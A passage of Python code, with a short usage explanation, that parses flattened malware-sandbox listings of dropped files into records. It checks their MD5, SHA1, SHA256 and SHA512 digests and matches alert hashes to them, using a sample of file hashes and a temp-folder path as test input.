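    if not m:
        return None
    return int(float(m.group(1)) * _UNITS[m.group(2).upper()])


def split_digest(line: str):
    """Split 'SHA147ef...' into ('SHA1', '47ef...'); (None, line) if no fit.

    Label and hex run together, so the expected digest length decides which
    label applies rather than a greedy prefix match.
    """
    for algo, want in DIGEST_LEN.items():
        if line.upper().startswith(algo):
            hexpart = line[len(algo):].strip()
            if len(hexpart) == want and _HEX.match(hexpart):
                return algo, hexpart.lower()
    return None, line


def parse_listing(text: str) -> list[DroppedFile]:
    """Turn the flattened listing into DroppedFile records, flagging gaps."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records: list[DroppedFile] = []
    cur: Optional[DroppedFile] = None
    i = 0
    while i < len(lines):
        ln = lines[i]
        i += 1
        if ln == "-":
            cur = DroppedFile()
            records.append(cur)
            continue
        if cur is None:  # tail of an entry cut off by a page break: keep, but flag
            cur = DroppedFile(problems=["entry starts before first separator"])
            records.append(cur)
        if ln.lower().startswith("filesize"):
            tok = ln[len("filesize"):].strip()   # fused form: 'Filesize695B'
            if not tok and i < len(lines):       # usual form: value on the next line
                tok = lines[i]
                i += 1
            cur.size_bytes = parse_size(tok)
            if cur.size_bytes is None:
                cur.problems.append(f"unparsed size {tok!r}")
        elif _WIN_PATH.match(ln):
            cur.path = ln
        else:
            algo, hexpart = split_digest(ln)
            if algo is None:
                cur.problems.append(f"unrecognised line {ln[:24]!r}")
            else:
                cur.digests[algo] = hexpart
    for rec in records:
        missing = [a for a in DIGEST_LEN if a not in rec.digests]
        if missing:
            rec.problems.append("missing " + ",".join(missing))
    return records


def find_by_hash(records: list[DroppedFile], value: str) -> Optional[DroppedFile]:
    """Match a hash from an alert (any algorithm, any case) to a dropped file."""
    v = value.strip().lower()
    return next((r for r in records if v in r.digests.values()), None)


# Constructed sample: three entries copied from the listing above, in the
# flattened form they appear in (cut-off tail, fused labels, inline size).
SAMPLE = r"""
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502
-
Filesize
52KB
MD5f4dc5211ec6e0136575803b613a53231
SHA147ef36d1018f18f0ed87e04cf1853cd65558691b
SHA2562ad54e07251b0fc0ba8045430898ee6ea1046b4735f901c0010152d4433276ac
SHA5123443eb5bc6abea9cc090b3c8c183f64cdf4ebb9382b2802903ce3d63e98adfb8f1d84dd5d5072fc5bc8da02989737cf1c87b1b890816158eb24f1beb733ef75c
-
C:\Users\Admin\AppData\Local\Temp\{007ffd04-f795-4b5a-bf8e-373bfffa4394}\df513079-9927-45c9-969d-fda124fb67ed.cmd
Filesize695B
MD5cb5a69840e4a0069cbe7f88c472d94bf
SHA18dabe422df5928533757313452c5a23f4eeac289
SHA256017cf24041ba24bd37d701338e1c8ddfc808dce9e7828c650ef22a3b741d5f31
SHA512dc596b4d08a7c977509bb2b77b3b469c3e5bb8135bd89d917bc7a86bdc07df8e391ba02ec7a988381a1e2e3bc870f7d4afd39e1a03723b851c6a352bbb2dbc58
"""
```

Run `parse_listing(SAMPLE)` and inspect each record's `problems` before trusting the set: the cut-off first entry comes back with only its SHA512 and is flagged as incomplete rather than discarded, so the SHA512 is still usable as an indicator while the missing MD5/SHA1/SHA256 are visible. `find_by_hash` is deliberately algorithm-agnostic because alerts from different tools report different digests for the same file.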